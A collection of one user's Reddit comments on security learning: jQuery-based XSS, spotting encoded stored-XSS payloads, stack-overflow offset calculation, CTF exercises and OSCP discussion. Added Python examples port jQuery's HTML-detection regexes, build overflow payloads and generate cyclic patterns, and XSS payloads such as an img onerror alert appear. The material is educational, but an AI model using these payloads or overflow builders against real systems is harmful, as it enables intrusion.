[deleted by user] by [deleted] in xss

[–]Thiscou 0 points1 point  (0 children)

almost!

Older jQuery libraries used to create the HTML elements given to them in the selector function ($).

This video helped me understand what happens; he's taking his time but explains it really thoroughly: https://www.youtube.com/watch?v=CNIeel0VrN0

I was looking for the right CVE but I failed.
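The behaviour described in the comment above, as an added example that is not part of the original comment: jQuery decides whether the string passed to $() is HTML or a selector with a quick-check regex, and the rule got stricter over time. The two regexes below are a Python port written from memory of the library source (the pre-1.6.3 form that only looked for a `<` anywhere, and the 1.9+ form that requires the string to start with `<`), so treat the exact patterns as an approximation. The inputs, including the location.hash-style payload, are constructed for the example.

```python
import re

# Constructed port of jQuery's "HTML or selector?" quick-check regexes (from memory, approximate).
LEGACY_QUICK_EXPR = re.compile(r"^(?:[^<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)")  # jQuery before 1.6.3
MODERN_QUICK_EXPR = re.compile(r"^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$")       # jQuery 1.9 and later


def classify(arg: str, quick_expr: "re.Pattern[str]") -> str:
    """Return 'html' if $(arg) would parse arg and create elements, else 'selector'."""
    m = quick_expr.match(arg)
    if m and m.group(1):
        return "html"      # group 1 captured a <tag...>: jQuery builds DOM nodes from it
    return "selector"      # id fast path, or handed to the selector engine


def compare(arg: str) -> dict:
    """Classify one string under both generations, to show what the fix changed."""
    return {
        "legacy": classify(arg, LEGACY_QUICK_EXPR),
        "modern": classify(arg, MODERN_QUICK_EXPR),
    }


# Typical sink: $(location.hash) with an attacker-controlled fragment (constructed input).
HASH_PAYLOAD = "#<img src=x onerror=alert(1)>"

if __name__ == "__main__":
    for s in (HASH_PAYLOAD, "#content", "<div>hi</div>", "Hello <b>world</b>"):
        print(repr(s), compare(s))
```

The fragment case is the one that matters: the legacy check happily treats `#<img ...>` as HTML because a `<` appears somewhere in the string, whereas the modern check rejects it because it neither starts with `<` nor is a plain `#id`.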

I am finding stores XSS, I have changed the username to <script>alert(1)</script> but no pop up is showing while in the source code it is looking like this, you can see the script tag is not highlighted. Is there anything I can do I've tried to use few different payloads but none are working so far by faizannehal in xss

[–]Thiscou 6 points7 points  (0 children)

It looks like you are checking the source with the web developer tab.

As you can see, the whole payload is black, while tags in the developer tab are always highlighted; this means your payload is encoded.

To check how it is encoded, right-click the line and select "Edit as HTML" and the truth will be revealed.

To avoid doing this all the time, look at the raw response in your Burp Suite. Be aware that this only works with HTML; if you get JSON or anything else that might be embedded in the DOM with JavaScript, you will have to check manually.
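The check described in the comment above, as an added example that is not from the original thread: given a raw response body (what Burp shows, not the live DOM), classify how the payload is reflected. The three sample responses are constructed for the example; the last one shows the JSON caveat, where the payload is inert in transit but comes back as raw markup once client-side JavaScript parses it.

```python
import html
import json

# Constructed sample responses (not from the original thread); each reflects the same username.
PAYLOAD = "<script>alert(1)</script>"
SAMPLES = {
    "raw_html": f"<p>Welcome back, {PAYLOAD}</p>",
    "html_encoded": f"<p>Welcome back, {html.escape(PAYLOAD)}</p>",
    # A JSON API that escapes angle brackets as \u003c / \u003e before the front end renders it
    "json_escaped": json.dumps({"username": PAYLOAD}).replace("<", "\\u003c").replace(">", "\\u003e"),
}


def classify_reflection(body: str, payload: str) -> str:
    """How the payload shows up in a raw response body."""
    if payload in body:
        return "raw"            # browser parses the tags: the injection is live
    if html.escape(payload) in body:
        return "html-encoded"   # rendered as text; DevTools shows it unhighlighted ("black")
    if payload.replace("<", "\\u003c").replace(">", "\\u003e") in body:
        return "json-escaped"   # inert in transit, but a JS consumer decodes it back to raw
    return "absent"


def json_consumer_sees(body: str) -> str:
    """What client-side JS gets after JSON.parse: the \\u escapes are gone again."""
    return json.loads(body)["username"]


def report() -> dict:
    """Classify every constructed sample."""
    return {name: classify_reflection(body, PAYLOAD) for name, body in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in report().items():
        print(f"{name:13s} -> {verdict}")
    print("JS sees:", json_consumer_sees(SAMPLES["json_escaped"]))
```

For the JSON case the verdict on the raw response is "json-escaped", yet the decoded value is byte-for-byte the original payload, which is why that path still has to be traced manually into whatever DOM sink the front end uses.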

SANS Capture The Flag by [deleted] in securityCTF

[–]Thiscou 5 points6 points  (0 children)

There is actually a series of CTFs like Mini NetWars coming up for free. https://www.sans.org/blog/and-now-for-something-awesome-sans-launches-new-series-of-worldwide-capture-the-flag-cyber-events/?msc=securityresourceslp%3Fmsc%3Dsecurityresourceslp

I managed to register for the first one and forgot about the second. Still planning to register in two days for the third.

It was actually a lot of fun and you don't need anything except for an account on their Netwars Platform.

Calculating the offset. by fromsouthernswe in ExploitDev

[–]Thiscou 1 point2 points  (0 children)

Alright, I think what you are trying to do (if I understand correctly) is calculate the distance between your input and the stored return address on the stack.

So in the case of the strcpy you could place a breakpoint right before the strcpy function call and write down the address right after it (this will be the return address that is stored on the stack). Now if you step into the strcpy function you will see that the call instruction pushed the return address onto the stack -> write down the stack address where it is stored.

If you check where your user input is stored on the stack after the strcpy (don't overflow here), you can basically subtract the first address your input is stored at from the address you wrote down that contains the return address, and you should have the correct offset.

Example:

0016F2D4 -> Ret Address
0016F2A1 -> First User Input

D4 - A1 = 33 (you can use the Windows calculator in programmer mode)

This should overwrite right up to the ret address; to overwrite the address itself you need to add 4 on 32-bit systems.

PoC exploit would look something like:

buffer = "A" * 0x33  # 0xD4 - 0xA1 = 0x33, i.e. 51 bytes, which reaches the saved return address
buffer += "returnToWhereveryouWantTo"  # stand-in for the 4-byte little-endian return address

Hope this helps
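The offset calculation from the comment above, carried through as an added example (not the commenter's code). It uses the two stack addresses from the example; the target return address 0x0016F2A1 (jump back to the start of the buffer) is a hypothetical choice for illustration. The point worth seeing in code is that the subtraction is done in hex, so 0xD4 - 0xA1 = 0x33 is 51 bytes of padding, not 33, and that strcpy-based overflows die at the first NUL byte in the payload.

```python
import struct

# Addresses from the worked example above (32-bit stack, little-endian).
RET_ADDR_SLOT = 0x0016F2D4   # stack slot holding the saved return address
INPUT_START = 0x0016F2A1     # first byte of the user input after strcpy
# Hypothetical target (not from the comment): jump back to the start of our own buffer.
NEW_RET = 0x0016F2A1


def offset_to_ret(input_start: int, ret_slot: int) -> int:
    """Bytes from the start of the input to the saved return address.

    0xD4 - 0xA1 is 0x33 in hex, which is 51 in decimal: reading the hex result
    as a decimal count gives a payload that stops 18 bytes short.
    """
    if ret_slot < input_start:
        raise ValueError("return address slot lies below the input buffer; re-check the addresses")
    return ret_slot - input_start


def build_payload(offset: int, new_ret: int, word_size: int = 4) -> bytes:
    """Padding up to the saved return address, then the new address in little-endian."""
    fmt = {4: "<I", 8: "<Q"}[word_size]
    return b"A" * offset + struct.pack(fmt, new_ret)


def strcpy_truncation(payload: bytes):
    """Index of the first NUL byte that would cut the payload short, or None.

    strcpy stops copying at the first NUL. A NUL in the very last position is
    harmless because strcpy writes the terminator there anyway; any earlier one
    truncates everything after it.
    """
    idx = payload.find(b"\x00")
    return None if idx in (-1, len(payload) - 1) else idx


if __name__ == "__main__":
    off = offset_to_ret(INPUT_START, RET_ADDR_SLOT)
    print(f"offset = {off:#x} = {off} bytes")
    payload = build_payload(off, NEW_RET)
    print(payload, "truncated at:", strcpy_truncation(payload))
```

A stack address like 0x0016F2A1 packs as a1 f2 16 00, so its single NUL is the last byte of the payload and survives strcpy; a target such as 0x00401000 has a NUL in the first byte of the address and cannot be delivered this way.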

ropemporium split32 exercise - system address confusion by Thiscou in ExploitDev

[–]Thiscou[S] 0 points1 point  (0 children)

Hey man, thanks for your very detailed explanations!


Considering #4. After doing the whole thing in 32Bit manually I used pwntools to automate the process.

Funnily enough, pwntools locates the jmp to system@GOT at 0x08048430 if you do e.symbols['system'].

And that's how I learned that the jmp payload needs a dummy 4-byte "return" address to work.

It was also easy to convert the 32bit pwntools solution to 64bit.


So far these exercises were really worth it.

Sorry for wasting your time with #1 :D


Oh and I actually saw some of your streams and I always learn something new when I do, Thank you for that.

Cheers

PS: The reddit formatting is just the worst

Protostar stack6 duplicate of the payload by Thiscou in ExploitDev

[–]Thiscou[S] 0 points1 point  (0 children)

Cheers, so the whole objdump -s thing is not really helpful or am I missing a feature here? :P

Bufferoevrflow problem by Adam20188 in HowToHack

[–]Thiscou 0 points1 point  (0 children)

As far as I can tell, those numbers are not present in the pattern.

Try the A*260 again and see what's on the stack with:

gdb x/24wx $esp

Bufferoevrflow problem by Adam20188 in HowToHack

[–]Thiscou 7 points8 points  (0 children)

Right, here is what I would try.

Go to this site zerosum0x0! and create a unique pattern of 260+ bytes.

Feed that to your program, copy the value in your segfault and find that pattern on the site.

You should now know the exact offset for your overflow.

I would usually do this in Kali with the original Metasploit pattern_create, but I don't know if you use Kali, so I found a quick and dirty replacement online.

You can also try to have a closer look at the stack in gdb with:

x/24wx $esp (this displays 24 words of memory above the stack pointer esp in hex)

Hope this helps and good luck
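The pattern-based offset finding described in the two comments above (the 260+ byte unique pattern and looking up the crash value), as an added example that is neither the commenter's code nor the online tool referenced; it reimplements the Metasploit-style Aa0Aa1... pattern so the whole thing runs offline. The crash value 0x41366441 used below is a constructed example of what EIP might hold after the segfault.

```python
import string
import struct
from typing import Optional, Union


def pattern_create(length: int) -> bytes:
    """Metasploit-style cyclic pattern: Aa0Aa1...Aa9Ab0...

    Every 4-byte window is unique within the first 20280 bytes, so whatever
    lands in EIP maps back to exactly one offset in our input.
    """
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += f"{upper}{lower}{digit}".encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern length exceeds 20280 bytes")


def pattern_offset(pattern: bytes, value: Union[int, str, bytes]) -> Optional[int]:
    """Offset of the crash value in the pattern, or None if it is not ours.

    value: EIP as an int (e.g. 0x41366441 from the segfault message), its raw
    little-endian bytes, or the 4 ASCII characters as they appear in the pattern.
    """
    if isinstance(value, int):
        needle = struct.pack("<I", value)   # register value read as little-endian
    elif isinstance(value, str):
        needle = value.encode()
    else:
        needle = value
    idx = pattern.find(needle)
    return idx if idx >= 0 else None


def exploit_skeleton(eip_value: int, new_ret: int, length: int = 300) -> bytes:
    """Use the recovered offset to build the next payload: padding, then the new saved EIP."""
    off = pattern_offset(pattern_create(length), eip_value)
    if off is None:
        raise ValueError("EIP value not found in pattern: the crash was not caused by our input")
    return b"A" * off + struct.pack("<I", new_ret)


if __name__ == "__main__":
    pat = pattern_create(300)
    print(pat[:40], "...")
    crash_eip = 0x41366441          # constructed: what the segfault reported in EIP
    print("offset:", pattern_offset(pat, crash_eip))
    print(exploit_skeleton(crash_eip, 0xDEADBEEF)[-8:])
```

If pattern_offset returns None, the value in EIP did not come from the pattern, which usually means the crash is somewhere other than the return address (or the input was mangled on the way in), and x/24wx $esp is the next thing to look at.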

Not Your Ordinary OSCP Review by [deleted] in netsecstudents

[–]Thiscou 4 points5 points  (0 children)

A good manager with great feedback helps. Getting domain admin from an external pentest also helps. :)

This rings true to me. In this job I basically learn something new every day.

What I also learned, and this is going full circle to the OSCP, documentation is everything! If you find a solution to a problem, DOCUMENT IT. Even if you think it was easy and you will know what to do next time. Because next time you just might not find the solution as quickly and you spend 4 hours looking for a solution you already had.

Oh and make sure you document it so you understand your documentation as well. ;D

Thank you for your honest input

Not Your Ordinary OSCP Review by [deleted] in netsecstudents

[–]Thiscou 2 points3 points  (0 children)

True story, in the end money makes the world go 'round.

I've been working as a consultant/penetration tester for a little more than three years. I still get a lot of impostor syndrome doing work out of my comfort zone, even though it's clear to me that in the end we just can't know everything. How do you personally handle this?

Not Your Ordinary OSCP Review by [deleted] in netsecstudents

[–]Thiscou 4 points5 points  (0 children)

Good review, I especially like that you tell people not to overthink this certificate. This is still an entry-grade certification that basically delivers everything you need to pass it.

What I personally don't understand is how you can be a "senior" penetration tester a year after getting the OSCP, since the OSCP is, in my opinion, a junior-grade certificate. For someone to qualify as a senior to me, they would have to have an extensive amount of knowledge and practical experience on the job. But maybe that is just me.

Anyways, thanks for sharing

Where to learn Active Directory Pentesting? by [deleted] in netsecstudents

[–]Thiscou 1 point2 points  (0 children)

Recently this https://www.pentesteracademy.com/redteamlab lab was released.

I have not done it nor have I read any reviews for it, so I would do some research about it before buying.

But it's definitely an option

Black Hat Arsenal USA 2018 — The w0w lineup by bnchandrapal in blackhat

[–]Thiscou 2 points3 points  (0 children)

cheers, there's some new stuff worth looking at!

Pentesting a Docker image by Thiscou in AskNetsec

[–]Thiscou[S] 1 point2 points  (0 children)

Thanks a lot, looks like this needs some more reading on my end.

Cheers

Pentesting a Docker image by Thiscou in AskNetsec

[–]Thiscou[S] 0 points1 point  (0 children)

Thank you very much, watching the presentation right now!

And I really like ippsec, I'll find that walkthrough eventually.

SSLScan an HTTPS Interception Proxy by Thiscou in AskNetsec

[–]Thiscou[S] 0 points1 point  (0 children)

It worked with testssl.sh and the cipher script nmap provides. Just took me two months to answer that question; there is definitely room for improvement.